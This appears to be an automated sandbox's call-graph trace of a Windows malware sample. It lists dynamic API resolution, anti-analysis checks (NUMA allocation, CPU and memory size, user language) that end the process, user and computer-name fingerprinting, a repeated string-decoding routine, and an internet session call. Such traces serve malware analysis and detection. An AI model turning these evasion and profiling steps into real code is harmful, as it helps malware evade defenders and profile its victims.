13530->13531 13802 559750 GetPEB 13531->13802 13533 559868 13534 559a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13533->13534 13535 55987a 13533->13535 13536 559af4 GetProcAddress 13534->13536 13537 559b0d 13534->13537 13538 55988c 21 API calls 13535->13538 13536->13537 13539 559b46 13537->13539 13540 559b16 GetProcAddress GetProcAddress 13537->13540 13538->13534 13541 559b4f GetProcAddress 13539->13541 13542 559b68 13539->13542 13540->13539 13541->13542 13543 559b71 GetProcAddress 13542->13543 13544 559b89 13542->13544 13543->13544 13545 556a00 13544->13545 13546 559b92 GetProcAddress GetProcAddress 13544->13546 13547 55a740 13545->13547 13546->13545 13548 55a750 13547->13548 13549 556a0d 13548->13549 13550 55a77e lstrcpy 13548->13550 13551 5411d0 13549->13551 13550->13549 13552 5411e8 13551->13552 13553 541217 13552->13553 13554 54120f ExitProcess 13552->13554 13555 541160 GetSystemInfo 13553->13555 13556 541184 13555->13556 13557 54117c ExitProcess 13555->13557 13558 541110 GetCurrentProcess VirtualAllocExNuma 13556->13558 13559 541141 ExitProcess 13558->13559 13560 541149 13558->13560 13803 5410a0 VirtualAlloc 13560->13803 13563 541220 13807 5589b0 13563->13807 13566 541249 __aulldiv 13567 54129a 13566->13567 13568 541292 ExitProcess 13566->13568 13569 556770 GetUserDefaultLangID 13567->13569 13570 5567d3 13569->13570 13571 556792 13569->13571 13577 541190 13570->13577 13571->13570 13572 5567b7 ExitProcess 13571->13572 13573 5567c1 ExitProcess 13571->13573 13574 5567a3 ExitProcess 13571->13574 13575 5567ad ExitProcess 13571->13575 13576 5567cb ExitProcess 13571->13576 13578 5578e0 3 API calls 13577->13578 13580 54119e 13578->13580 13579 5411cc 13584 557850 GetProcessHeap RtlAllocateHeap GetUserNameA 13579->13584 13580->13579 13581 557850 3 API calls 13580->13581 13582 5411b7 13581->13582 13582->13579 13583 5411c4 ExitProcess 13582->13583 13585 556a30 13584->13585 13586 5578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13585->13586 13587 556a43 13586->13587 13588 55a9b0 13587->13588 13809 55a710 13588->13809 13590 55a9c1 lstrlen 13592 55a9e0 13590->13592 13591 55aa18 13810 55a7a0 13591->13810 13592->13591 13594 55a9fa lstrcpy lstrcat 13592->13594 13594->13591 13595 55aa24 13595->13423 13597 55a8bb 13596->13597 13598 55a90b 13597->13598 13599 55a8f9 lstrcpy 13597->13599 13598->13433 13599->13598 13814 556820 13600->13814 13602 55698e 13603 556998 sscanf 13602->13603 13843 55a800 13603->13843 13605 5569aa SystemTimeToFileTime SystemTimeToFileTime 13606 5569e0 13605->13606 13607 5569ce 13605->13607 13609 555b10 13606->13609 13607->13606 13608 5569d8 ExitProcess 13607->13608 13610 555b1d 13609->13610 13611 55a740 lstrcpy 13610->13611 13612 555b2e 13611->13612 13845 55a820 lstrlen 13612->13845 13615 55a820 2 API calls 13616 555b64 13615->13616 13617 55a820 2 API calls 13616->13617 13618 555b74 13617->13618 13849 556430 13618->13849 13621 55a820 2 API calls 13622 555b93 13621->13622 13623 55a820 2 API calls 13622->13623 13624 555ba0 13623->13624 13625 55a820 2 API calls 13624->13625 13626 555bad 13625->13626 13627 55a820 2 API calls 13626->13627 13628 555bf9 13627->13628 13858 5426a0 13628->13858 13636 555cc3 13637 556430 lstrcpy 13636->13637 13638 555cd5 13637->13638 13639 55a7a0 lstrcpy 13638->13639 13640 555cf2 13639->13640 13641 55a9b0 4 API calls 13640->13641 13642 555d0a 13641->13642 13643 55a8a0 lstrcpy 13642->13643 13644 555d16 13643->13644 13645 55a9b0 4 API calls 13644->13645 13646 555d3a 13645->13646 13647 55a8a0 lstrcpy 13646->13647 13648 555d46 13647->13648 13649 55a9b0 4 API calls 13648->13649 13650 555d6a 13649->13650 13651 55a8a0 lstrcpy 13650->13651 13652 555d76 13651->13652 13653 55a740 lstrcpy 13652->13653 13654 555d9e 13653->13654 14584 557500 GetWindowsDirectoryA 13654->14584 13657 55a7a0 lstrcpy 13658 555db8 13657->13658 14594 544880 13658->14594 13660 555dbe 14739 5517a0 13660->14739 13662 555dc6 13663 55a740 lstrcpy 13662->13663 13664 555de9 13663->13664 13665 541590 lstrcpy 13664->13665 13666 555dfd 13665->13666 14755 545960 13666->14755 13668 555e03 14899 551050 13668->14899 13670 555e0e 13671 55a740 lstrcpy 13670->13671 13672 555e32 13671->13672 13673 541590 lstrcpy 13672->13673 13674 555e46 13673->13674 13675 545960 34 API calls 13674->13675 13676 555e4c 13675->13676 14903 550d90 13676->14903 13678 555e57 13679 55a740 lstrcpy 13678->13679 13680 555e79 13679->13680 13681 541590 lstrcpy 13680->13681 13682 555e8d 13681->13682 13683 545960 34 API calls 13682->13683 13684 555e93 13683->13684 14910 550f40 13684->14910 13686 555e9e 13687 541590 lstrcpy 13686->13687 13688 555eb5 13687->13688 14915 551a10 13688->14915 13690 555eba 13691 55a740 lstrcpy 13690->13691 13692 555ed6 13691->13692 15259 544fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13692->15259 13694 555edb 13695 541590 lstrcpy 13694->13695 13696 555f5b 13695->13696 15266 550740 13696->15266 13698 555f60 13699 55a740 lstrcpy 13698->13699 13700 555f86 13699->13700 13701 541590 lstrcpy 13700->13701 13702 555f9a 13701->13702 13703 545960 34 API calls 13702->13703 13704 555fa0 13703->13704 13798 5445d1 RtlAllocateHeap 13797->13798 13800 544621 VirtualProtect 13798->13800 13800->13446 13802->13533 13804 5410c2 ctype 13803->13804 13805 5410fd 13804->13805 13806 5410e2 VirtualFree 13804->13806 13805->13563 13806->13805 13808 541233 GlobalMemoryStatusEx 13807->13808 13808->13566 13809->13590 13811 55a7c2 13810->13811 13812 55a7ec 13811->13812 13813 55a7da lstrcpy 13811->13813 13812->13595 13813->13812 13815 55a740 lstrcpy 13814->13815 13816 556833 13815->13816 13817 55a9b0 4 API calls 13816->13817 13818 556845 13817->13818 13819 55a8a0 lstrcpy 13818->13819 13820 55684e 13819->13820 13821 55a9b0 4 API calls 13820->13821 13822 556867 13821->13822 13823 55a8a0 lstrcpy 13822->13823 13824 556870 13823->13824 13825 55a9b0 4 API calls 13824->13825 13826 55688a 13825->13826 13827 55a8a0 lstrcpy 13826->13827 13828 556893 13827->13828 13829 55a9b0 4 API calls 13828->13829 13830 5568ac 13829->13830 13831 55a8a0 lstrcpy 13830->13831 13832 5568b5 13831->13832 13833 55a9b0 4 API calls 13832->13833 13834 5568cf 13833->13834 13835 55a8a0 lstrcpy 13834->13835 13836 5568d8 13835->13836 13837 55a9b0 4 API calls 13836->13837 13838 5568f3 13837->13838 13839 55a8a0 lstrcpy 13838->13839 13840 5568fc 13839->13840 13841 55a7a0 lstrcpy 13840->13841 13842 556910 13841->13842 13842->13602 13844 55a812 13843->13844 13844->13605 13846 55a83f 13845->13846 13847 555b54 13846->13847 13848 55a87b lstrcpy 13846->13848 13847->13615 13848->13847 13850 55a8a0 lstrcpy 13849->13850 13851 556443 13850->13851 13852 55a8a0 lstrcpy 13851->13852 13853 556455 13852->13853 13854 55a8a0 lstrcpy 13853->13854 13855 556467 13854->13855 13856 55a8a0 lstrcpy 13855->13856 13857 555b86 13856->13857 13857->13621 13859 5445c0 2 API calls 13858->13859 13860 5426b4 13859->13860 13861 5445c0 2 API calls 13860->13861 13862 5426d7 13861->13862 13863 5445c0 2 API calls 13862->13863 13864 5426f0 13863->13864 13865 5445c0 2 API calls 13864->13865 13866 542709 13865->13866 13867 5445c0 2 API calls 13866->13867 13868 542736 13867->13868 13869 5445c0 2 API calls 13868->13869 13870 54274f 13869->13870 13871 5445c0 2 API calls 13870->13871 13872 542768 13871->13872 13873 5445c0 2 API calls 13872->13873 13874 542795 13873->13874 13875 5445c0 2 API calls 13874->13875 13876 5427ae 13875->13876 13877 5445c0 2 API calls 13876->13877 13878 5427c7 13877->13878 13879 5445c0 2 API calls 13878->13879 13880 5427e0 13879->13880 13881 5445c0 2 API calls 13880->13881 13882 5427f9 13881->13882 13883 5445c0 2 API calls 13882->13883 13884 542812 13883->13884 13885 5445c0 2 API calls 13884->13885 13886 54282b 13885->13886 13887 5445c0 2 API calls 13886->13887 13888 542844 13887->13888 13889 5445c0 2 API calls 13888->13889 13890 54285d 13889->13890 13891 5445c0 2 API calls 13890->13891 13892 542876 13891->13892 13893 5445c0 2 API calls 13892->13893 13894 54288f 13893->13894 13895 5445c0 2 API calls 13894->13895 13896 5428a8 13895->13896 13897 5445c0 2 API calls 13896->13897 13898 5428c1 13897->13898 13899 5445c0 2 API calls 13898->13899 13900 5428da 13899->13900 13901 5445c0 2 API calls 13900->13901 13902 5428f3 13901->13902 13903 5445c0 2 API calls 13902->13903 13904 54290c 13903->13904 13905 5445c0 2 API calls 13904->13905 13906 542925 13905->13906 13907 5445c0 2 API calls 13906->13907 13908 54293e 13907->13908 13909 5445c0 2 API calls 13908->13909 13910 542957 13909->13910 13911 5445c0 2 API calls 13910->13911 13912 542970 13911->13912 13913 5445c0 2 API calls 13912->13913 13914 542989 13913->13914 13915 5445c0 2 API calls 13914->13915 13916 5429a2 13915->13916 13917 5445c0 2 API calls 13916->13917 13918 5429bb 13917->13918 13919 5445c0 2 API calls 13918->13919 13920 5429d4 13919->13920 13921 5445c0 2 API calls 13920->13921 13922 5429ed 13921->13922 13923 5445c0 2 API calls 13922->13923 13924 542a06 13923->13924 13925 5445c0 2 API calls 13924->13925 13926 542a1f 13925->13926 13927 5445c0 2 API calls 13926->13927 13928 542a38 13927->13928 13929 5445c0 2 API calls 13928->13929 13930 542a51 13929->13930 13931 5445c0 2 API calls 13930->13931 13932 542a6a 13931->13932 13933 5445c0 2 API calls 13932->13933 13934 542a83 13933->13934 13935 5445c0 2 API calls 13934->13935 13936 542a9c 13935->13936 13937 5445c0 2 API calls 13936->13937 13938 542ab5 13937->13938 13939 5445c0 2 API calls 13938->13939 13940 542ace 13939->13940 13941 5445c0 2 API calls 13940->13941 13942 542ae7 13941->13942 13943 5445c0 2 API calls 13942->13943 13944 542b00 13943->13944 13945 5445c0 2 API calls 13944->13945 13946 542b19 13945->13946 13947 5445c0 2 API calls 13946->13947 13948 542b32 13947->13948 13949 5445c0 2 API calls 13948->13949 13950 542b4b 13949->13950 13951 5445c0 2 API calls 13950->13951 13952 542b64 13951->13952 13953 5445c0 2 API calls 13952->13953 13954 542b7d 13953->13954 13955 5445c0 2 API calls 13954->13955 13956 542b96 13955->13956 13957 5445c0 2 API calls 13956->13957 13958 542baf 13957->13958 13959 5445c0 2 API calls 13958->13959 13960 542bc8 13959->13960 13961 5445c0 2 API calls 13960->13961 13962 542be1 13961->13962 13963 5445c0 2 API calls 13962->13963 13964 542bfa 13963->13964 13965 5445c0 2 API calls 13964->13965 13966 542c13 13965->13966 13967 5445c0 2 API calls 13966->13967 13968 542c2c 13967->13968 13969 5445c0 2 API calls 13968->13969 13970 542c45 13969->13970 13971 5445c0 2 API calls 13970->13971 13972 542c5e 13971->13972 13973 5445c0 2 API calls 13972->13973 13974 542c77 13973->13974 13975 5445c0 2 API calls 13974->13975 13976 542c90 13975->13976 13977 5445c0 2 API calls 13976->13977 13978 542ca9 13977->13978 13979 5445c0 2 API calls 13978->13979 13980 542cc2 13979->13980 13981 5445c0 2 API calls 13980->13981 13982 542cdb 13981->13982 13983 5445c0 2 API calls 13982->13983 13984 542cf4 13983->13984 13985 5445c0 2 API calls 13984->13985 13986 542d0d 13985->13986 13987 5445c0 2 API calls 13986->13987 13988 542d26 13987->13988 13989 5445c0 2 API calls 13988->13989 13990 542d3f 13989->13990 13991 5445c0 2 API calls 13990->13991 13992 542d58 13991->13992 13993 5445c0 2 API calls 13992->13993 13994 542d71 13993->13994 13995 5445c0 2 API calls 13994->13995 13996 542d8a 13995->13996 13997 5445c0 2 API calls 13996->13997 13998 542da3 13997->13998 13999 5445c0 2 API calls 13998->13999 14000 542dbc 13999->14000 14001 5445c0 2 API calls 14000->14001 14002 542dd5 14001->14002 14003 5445c0 2 API calls 14002->14003 14004 542dee 14003->14004 14005 5445c0 2 API calls 14004->14005 14006 542e07 14005->14006 14007 5445c0 2 API calls 14006->14007 14008 542e20 14007->14008 14009 5445c0 2 API calls 14008->14009 14010 542e39 14009->14010 14011 5445c0 2 API calls 14010->14011 14012 542e52 14011->14012 14013 5445c0 2 API calls 14012->14013 14014 542e6b 14013->14014 14015 5445c0 2 API calls 14014->14015 14016 542e84 14015->14016 14017 5445c0 2 API calls 14016->14017 14018 542e9d 14017->14018 14019 5445c0 2 API calls 14018->14019 14020 542eb6 14019->14020 14021 5445c0 2 API calls 14020->14021 14022 542ecf 14021->14022 14023 5445c0 2 API calls 14022->14023 14024 542ee8 14023->14024 14025 5445c0 2 API calls 14024->14025 14026 542f01 14025->14026 14027 5445c0 2 API calls 14026->14027 14028 542f1a 14027->14028 14029 5445c0 2 API calls 14028->14029 14030 542f33 14029->14030 14031 5445c0 2 API calls 14030->14031 14032 542f4c 14031->14032 14033 5445c0 2 API calls 14032->14033 14034 542f65 14033->14034 14035 5445c0 2 API calls 14034->14035 14036 542f7e 14035->14036 14037 5445c0 2 API calls 14036->14037 14038 542f97 14037->14038 14039 5445c0 2 API calls 14038->14039 14040 542fb0 14039->14040 14041 5445c0 2 API calls 14040->14041 14042 542fc9 14041->14042 14043 5445c0 2 API calls 14042->14043 14044 542fe2 14043->14044 14045 5445c0 2 API calls 14044->14045 14046 542ffb 14045->14046 14047 5445c0 2 API calls 14046->14047 14048 543014 14047->14048 14049 5445c0 2 API calls 14048->14049 14050 54302d 14049->14050 14051 5445c0 2 API calls 14050->14051 14052 543046 14051->14052 14053 5445c0 2 API calls 14052->14053 14054 54305f 14053->14054 14055 5445c0 2 API calls 14054->14055 14056 543078 14055->14056 14057 5445c0 2 API calls 14056->14057 14058 543091 14057->14058 14059 5445c0 2 API calls 14058->14059 14060 5430aa 14059->14060 14061 5445c0 2 API calls 14060->14061 14062 5430c3 14061->14062 14063 5445c0 2 API calls 14062->14063 14064 5430dc 14063->14064 14065 5445c0 2 API calls 14064->14065 14066 5430f5 14065->14066 14067 5445c0 2 API calls 14066->14067 14068 54310e 14067->14068 14069 5445c0 2 API calls 14068->14069 14070 543127 14069->14070 14071 5445c0 2 API calls 14070->14071 14072 543140 14071->14072 14073 5445c0 2 API calls 14072->14073 14074 543159 14073->14074 14075 5445c0 2 API calls 14074->14075 14076 543172 14075->14076 14077 5445c0 2 API calls 14076->14077 14078 54318b 14077->14078 14079 5445c0 2 API calls 14078->14079 14080 5431a4 14079->14080 14081 5445c0 2 API calls 14080->14081 14082 5431bd 14081->14082 14083 5445c0 2 API calls 14082->14083 14084 5431d6 14083->14084 14085 5445c0 2 API calls 14084->14085 14086 5431ef 14085->14086 14087 5445c0 2 API calls 14086->14087 14088 543208 14087->14088 14089 5445c0 2 API calls 14088->14089 14090 543221 14089->14090 14091 5445c0 2 API calls 14090->14091 14092 54323a 14091->14092 14093 5445c0 2 API calls 14092->14093 14094 543253 14093->14094 14095 5445c0 2 API calls 14094->14095 14096 54326c 14095->14096 14097 5445c0 2 API calls 14096->14097 14098 543285 14097->14098 14099 5445c0 2 API calls 14098->14099 14100 54329e 14099->14100 14101 5445c0 2 API calls 14100->14101 14102 5432b7 14101->14102 14103 5445c0 2 API calls 14102->14103 14104 5432d0 14103->14104 14105 5445c0 2 API calls 14104->14105 14106 5432e9 14105->14106 14107 5445c0 2 API calls 14106->14107 14108 543302 14107->14108 14109 5445c0 2 API calls 14108->14109 14110 54331b 14109->14110 14111 5445c0 2 API calls 14110->14111 14112 543334 14111->14112 14113 5445c0 2 API calls 14112->14113 14114 54334d 14113->14114 14115 5445c0 2 API calls 14114->14115 14116 543366 14115->14116 14117 5445c0 2 API calls 14116->14117 14118 54337f 14117->14118 14119 5445c0 2 API calls 14118->14119 14120 543398 14119->14120 14121 5445c0 2 API calls 14120->14121 14122 5433b1 14121->14122 14123 5445c0 2 API calls 14122->14123 14124 5433ca 14123->14124 14125 5445c0 2 API calls 14124->14125 14126 5433e3 14125->14126 14127 5445c0 2 API calls 14126->14127 14128 5433fc 14127->14128 14129 5445c0 2 API calls 14128->14129 14130 543415 14129->14130 14131 5445c0 2 API calls 14130->14131 14132 54342e 14131->14132 14133 5445c0 2 API calls 14132->14133 14134 543447 14133->14134 14135 5445c0 2 API calls 14134->14135 14136 543460 14135->14136 14137 5445c0 2 API calls 14136->14137 14138 543479 14137->14138 14139 5445c0 2 API calls 14138->14139 14140 543492 14139->14140 14141 5445c0 2 API calls 14140->14141 14142 5434ab 14141->14142 14143 5445c0 2 API calls 14142->14143 14144 5434c4 14143->14144 14145 5445c0 2 API calls 14144->14145 14146 5434dd 14145->14146 14147 5445c0 2 API calls 14146->14147 14148 5434f6 14147->14148 14149 5445c0 2 API calls 14148->14149 14150 54350f 14149->14150 14151 5445c0 2 API calls 14150->14151 14152 543528 14151->14152 14153 5445c0 2 API calls 14152->14153 14154 543541 14153->14154 14155 5445c0 2 API calls 14154->14155 14156 54355a 14155->14156 14157 5445c0 2 API calls 14156->14157 14158 543573 14157->14158 14159 5445c0 2 API calls 14158->14159 14160 54358c 14159->14160 14161 5445c0 2 API calls 14160->14161 14162 5435a5 14161->14162 14163 5445c0 2 API calls 14162->14163 14164 5435be 14163->14164 14165 5445c0 2 API calls 14164->14165 14166 5435d7 14165->14166 14167 5445c0 2 API calls 14166->14167 14168 5435f0 14167->14168 14169 5445c0 2 API calls 14168->14169 14170 543609 14169->14170 14171 5445c0 2 API calls 14170->14171 14172 543622 14171->14172 14173 5445c0 2 API calls 14172->14173 14174 54363b 14173->14174 14175 5445c0 2 API calls 14174->14175 14176 543654 14175->14176 14177 5445c0 2 API calls 14176->14177 14178 54366d 14177->14178 14179 5445c0 2 API calls 14178->14179 14180 543686 14179->14180 14181 5445c0 2 API calls 14180->14181 14182 54369f 14181->14182 14183 5445c0 2 API calls 14182->14183 14184 5436b8 14183->14184 14185 5445c0 2 API calls 14184->14185 14186 5436d1 14185->14186 14187 5445c0 2 API calls 14186->14187 14188 5436ea 14187->14188 14189 5445c0 2 API calls 14188->14189 14190 543703 14189->14190 14191 5445c0 2 API calls 14190->14191 14192 54371c 14191->14192 14193 5445c0 2 API calls 14192->14193 14194 543735 14193->14194 14195 5445c0 2 API calls 14194->14195 14196 54374e 14195->14196 14197 5445c0 2 API calls 14196->14197 14198 543767 14197->14198 14199 5445c0 2 API calls 14198->14199 14200 543780 14199->14200 14201 5445c0 2 API calls 14200->14201 14202 543799 14201->14202 14203 5445c0 2 API calls 14202->14203 14204 5437b2 14203->14204 14205 5445c0 2 API calls 14204->14205 14206 5437cb 14205->14206 14207 5445c0 2 API calls 14206->14207 14208 5437e4 14207->14208 14209 5445c0 2 API calls 14208->14209 14210 5437fd 14209->14210 14211 5445c0 2 API calls 14210->14211 14212 543816 14211->14212 14213 5445c0 2 API calls 14212->14213 14214 54382f 14213->14214 14215 5445c0 2 API calls 14214->14215 14216 543848 14215->14216 14217 5445c0 2 API calls 14216->14217 14218 543861 14217->14218 14219 5445c0 2 API calls 14218->14219 14220 54387a 14219->14220 14221 5445c0 2 API calls 14220->14221 14222 543893 14221->14222 14223 5445c0 2 API calls 14222->14223 14224 5438ac 14223->14224 14225 5445c0 2 API calls 14224->14225 14226 5438c5 14225->14226 14227 5445c0 2 API calls 14226->14227 14228 5438de 14227->14228 14229 5445c0 2 API calls 14228->14229 14230 5438f7 14229->14230 14231 5445c0 2 API calls 14230->14231 14232 543910 14231->14232 14233 5445c0 2 API calls 14232->14233 14234 543929 14233->14234 14235 5445c0 2 API calls 14234->14235 14236 543942 14235->14236 14237 5445c0 2 API calls 14236->14237 14238 54395b 14237->14238 14239 5445c0 2 API calls 14238->14239 14240 543974 14239->14240 14241 5445c0 2 API calls 14240->14241 14242 54398d 14241->14242 14243 5445c0 2 API calls 14242->14243 14244 5439a6 14243->14244 14245 5445c0 2 API calls 14244->14245 14246 5439bf 14245->14246 14247 5445c0 2 API calls 14246->14247 14248 5439d8 14247->14248 14249 5445c0 2 API calls 14248->14249 14250 5439f1 14249->14250 14251 5445c0 2 API calls 14250->14251 14252 543a0a 14251->14252 14253 5445c0 2 API calls 14252->14253 14254 543a23 14253->14254 14255 5445c0 2 API calls 14254->14255 14256 543a3c 14255->14256 14257 5445c0 2 API calls 14256->14257 14258 543a55 14257->14258 14259 5445c0 2 API calls 14258->14259 14260 543a6e 14259->14260 14261 5445c0 2 API calls 14260->14261 14262 543a87 14261->14262 14263 5445c0 2 API calls 14262->14263 14264 543aa0 14263->14264 14265 5445c0 2 API calls 14264->14265 14266 543ab9 14265->14266 14267 5445c0 2 API calls 14266->14267 14268 543ad2 14267->14268 14269 5445c0 2 API calls 14268->14269 14270 543aeb 14269->14270 14271 5445c0 2 API calls 14270->14271 14272 543b04 14271->14272 14273 5445c0 2 API calls 14272->14273 14274 543b1d 14273->14274 14275 5445c0 2 API calls 14274->14275 14276 543b36 14275->14276 14277 5445c0 2 API calls 14276->14277 14278 543b4f 14277->14278 14279 5445c0 2 API calls 14278->14279 14280 543b68 14279->14280 14281 5445c0 2 API calls 14280->14281 14282 543b81 14281->14282 14283 5445c0 2 API calls 14282->14283 14284 543b9a 14283->14284 14285 5445c0 2 API calls 14284->14285 14286 543bb3 14285->14286 14287 5445c0 2 API calls 14286->14287 14288 543bcc 14287->14288 14289 5445c0 2 API calls 14288->14289 14290 543be5 14289->14290 14291 5445c0 2 API calls 14290->14291 14292 543bfe 14291->14292 14293 5445c0 2 API calls 14292->14293 14294 543c17 14293->14294 14295 5445c0 2 API calls 14294->14295 14296 543c30 14295->14296 14297 5445c0 2 API calls 14296->14297 14298 543c49 14297->14298 14299 5445c0 2 API calls 14298->14299 14300 543c62 14299->14300 14301 5445c0 2 API calls 14300->14301 14302 543c7b 14301->14302 14303 5445c0 2 API calls 14302->14303 14304 543c94 14303->14304 14305 5445c0 2 API calls 14304->14305 14306 543cad 14305->14306 14307 5445c0 2 API calls 14306->14307 14308 543cc6 14307->14308 14309 5445c0 2 API calls 14308->14309 14310 543cdf 14309->14310 14311 5445c0 2 API calls 14310->14311 14312 543cf8 14311->14312 14313 5445c0 2 API calls 14312->14313 14314 543d11 14313->14314 14315 5445c0 2 API calls 14314->14315 14316 543d2a 14315->14316 14317 5445c0 2 API calls 14316->14317 14318 543d43 14317->14318 14319 5445c0 2 API calls 14318->14319 14320 543d5c 14319->14320 14321 5445c0 2 API calls 14320->14321 14322 543d75 14321->14322 14323 5445c0 2 API calls 14322->14323 14324 543d8e 14323->14324 14325 5445c0 2 API calls 14324->14325 14326 543da7 14325->14326 14327 5445c0 2 API calls 14326->14327 14328 543dc0 14327->14328 14329 5445c0 2 API calls 14328->14329 14330 543dd9 14329->14330 14331 5445c0 2 API calls 14330->14331 14332 543df2 14331->14332 14333 5445c0 2 API calls 14332->14333 14334 543e0b 14333->14334 14335 5445c0 2 API calls 14334->14335 14336 543e24 14335->14336 14337 5445c0 2 API calls 14336->14337 14338 543e3d 14337->14338 14339 5445c0 2 API calls 14338->14339 14340 543e56 14339->14340 14341 5445c0 2 API calls 14340->14341 14342 543e6f 14341->14342 14343 5445c0 2 API calls 14342->14343 14344 543e88 14343->14344 14345 5445c0 2 API calls 14344->14345 14346 543ea1 14345->14346 14347 5445c0 2 API calls 14346->14347 14348 543eba 14347->14348 14349 5445c0 2 API calls 14348->14349 14350 543ed3 14349->14350 14351 5445c0 2 API calls 14350->14351 14352 543eec 14351->14352 14353 5445c0 2 API calls 14352->14353 14354 543f05 14353->14354 14355 5445c0 2 API calls 14354->14355 14356 543f1e 14355->14356 14357 5445c0 2 API calls 14356->14357 14358 543f37 14357->14358 14359 5445c0 2 API calls 14358->14359 14360 543f50 14359->14360 14361 5445c0 2 API calls 14360->14361 14362 543f69 14361->14362 14363 5445c0 2 API calls 14362->14363 14364 543f82 14363->14364 14365 5445c0 2 API calls 14364->14365 14366 543f9b 14365->14366 14367 5445c0 2 API calls 14366->14367 14368 543fb4 14367->14368 14369 5445c0 2 API calls 14368->14369 14370 543fcd 14369->14370 14371 5445c0 2 API calls 14370->14371 14372 543fe6 14371->14372 14373 5445c0 2 API calls 14372->14373 14374 543fff 14373->14374 14375 5445c0 2 API calls 14374->14375 14376 544018 14375->14376 14377 5445c0 2 API calls 14376->14377 14378 544031 14377->14378 14379 5445c0 2 API calls 14378->14379 14380 54404a 14379->14380 14381 5445c0 2 API calls 14380->14381 14382 544063 14381->14382 14383 5445c0 2 API calls 14382->14383 14384 54407c 14383->14384 14385 5445c0 2 API calls 14384->14385 14386 544095 14385->14386 14387 5445c0 2 API calls 14386->14387 14388 5440ae 14387->14388 14389 5445c0 2 API calls 14388->14389 14390 5440c7 14389->14390 14391 5445c0 2 API calls 14390->14391 14392 5440e0 14391->14392 14393 5445c0 2 API calls 14392->14393 14394 5440f9 14393->14394 14395 5445c0 2 API calls 14394->14395 14396 544112 14395->14396 14397 5445c0 2 API calls 14396->14397 14398 54412b 14397->14398 14399 5445c0 2 API calls 14398->14399 14400 544144 14399->14400 14401 5445c0 2 API calls 14400->14401 14402 54415d 14401->14402 14403 5445c0 2 API calls 14402->14403 14404 544176 14403->14404 14405 5445c0 2 API calls 14404->14405 14406 54418f 14405->14406 14407 5445c0 2 API calls 14406->14407 14408 5441a8 14407->14408 14409 5445c0 2 API calls 14408->14409 14410 5441c1 14409->14410 14411 5445c0 2 API calls 14410->14411 14412 5441da 14411->14412 14413 5445c0 2 API calls 14412->14413 14414 5441f3 14413->14414 14415 5445c0 2 API calls 14414->14415 14416 54420c 14415->14416 14417 5445c0 2 API calls 14416->14417 14418 544225 14417->14418 14419 5445c0 2 API calls 14418->14419 14420 54423e 14419->14420 14421 5445c0 2 API calls 14420->14421 14422 544257 14421->14422 14423 5445c0 2 API calls 14422->14423 14424 544270 14423->14424 14425 5445c0 2 API calls 14424->14425 14426 544289 14425->14426 14427 5445c0 2 API calls 14426->14427 14428 5442a2 14427->14428 14429 5445c0 2 API calls 14428->14429 14430 5442bb 14429->14430 14431 5445c0 2 API calls 14430->14431 14432 5442d4 14431->14432 14433 5445c0 2 API calls 14432->14433 14434 5442ed 14433->14434 14435 5445c0 2 API calls 14434->14435 14436 544306 14435->14436 14437 5445c0 2 API calls 14436->14437 14438 54431f 14437->14438 14439 5445c0 2 API calls 14438->14439 14440 544338 14439->14440 14441 5445c0 2 API calls 14440->14441 14442 544351 14441->14442 14443 5445c0 2 API calls 14442->14443 14444 54436a 14443->14444 14445 5445c0 2 API calls 14444->14445 14446 544383 14445->14446 14447 5445c0 2 API calls 14446->14447 14448 54439c 14447->14448 14449 5445c0 2 API calls 14448->14449 14450 5443b5 14449->14450 14451 5445c0 2 API calls 14450->14451 14452 5443ce 14451->14452 14453 5445c0 2 API calls 14452->14453 14454 5443e7 14453->14454 14455 5445c0 2 API calls 14454->14455 14456 544400 14455->14456 14457 5445c0 2 API calls 14456->14457 14458 544419 14457->14458 14459 5445c0 2 API calls 14458->14459 14460 544432 14459->14460 14461 5445c0 2 API calls 14460->14461 14462 54444b 14461->14462 14463 5445c0 2 API calls 14462->14463 14464 544464 14463->14464 14465 5445c0 2 API calls 14464->14465 14466 54447d 14465->14466 14467 5445c0 2 API calls 14466->14467 14468 544496 14467->14468 14469 5445c0 2 API calls 14468->14469 14470 5444af 14469->14470 14471 5445c0 2 API calls 14470->14471 14472 5444c8 14471->14472 14473 5445c0 2 API calls 14472->14473 14474 5444e1 14473->14474 14475 5445c0 2 API calls 14474->14475 14476 5444fa 14475->14476 14477 5445c0 2 API calls 14476->14477 14478 544513 14477->14478 14479 5445c0 2 API calls 14478->14479 14480 54452c 14479->14480 14481 5445c0 2 API calls 14480->14481 14482 544545 14481->14482 14483 5445c0 2 API calls 14482->14483 14484 54455e 14483->14484 14485 5445c0 2 API calls 14484->14485 14486 544577 14485->14486 14487 5445c0 2 API calls 14486->14487 14488 544590 14487->14488 14489 5445c0 2 API calls 14488->14489 14490 5445a9 14489->14490 14491 559c10 14490->14491 14492 55a036 8 API calls 14491->14492 14493 559c20 43 API calls 14491->14493 14494 55a146 14492->14494 14495 55a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14492->14495 14493->14492 14496 55a216 14494->14496 14497 55a153 8 API calls 14494->14497 14495->14494 14498 55a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14496->14498 14499 55a298 14496->14499 14497->14496 14498->14499 14500 55a2a5 6 API calls 14499->14500 14501 55a337 14499->14501 14500->14501 14502 55a344 9 API calls 14501->14502 14503 55a41f 14501->14503 14502->14503 14504 55a4a2 14503->14504 14505 55a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14503->14505 14506 55a4dc 14504->14506 14507 55a4ab GetProcAddress GetProcAddress 14504->14507 14505->14504 14508 55a515 14506->14508 14509 55a4e5 GetProcAddress GetProcAddress 14506->14509 14507->14506 14510 55a612 14508->14510 14511 55a522 10 API calls 14508->14511 14509->14508 14512 55a67d 14510->14512 14513 55a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14510->14513 14511->14510 14514 55a686 GetProcAddress 14512->14514 14515 55a69e 14512->14515 14513->14512 14514->14515 14516 55a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14515->14516 14517 555ca3 14515->14517 14516->14517 14518 541590 14517->14518 15639 541670 14518->15639 14521 55a7a0 lstrcpy 14522 5415b5 14521->14522 14523 55a7a0 lstrcpy 14522->14523 14524 5415c7 14523->14524 14525 55a7a0 lstrcpy 14524->14525 14526 5415d9 14525->14526 14527 55a7a0 lstrcpy 14526->14527 14528 541663 14527->14528 14529 555510 14528->14529 14530 555521 14529->14530 14531 55a820 2 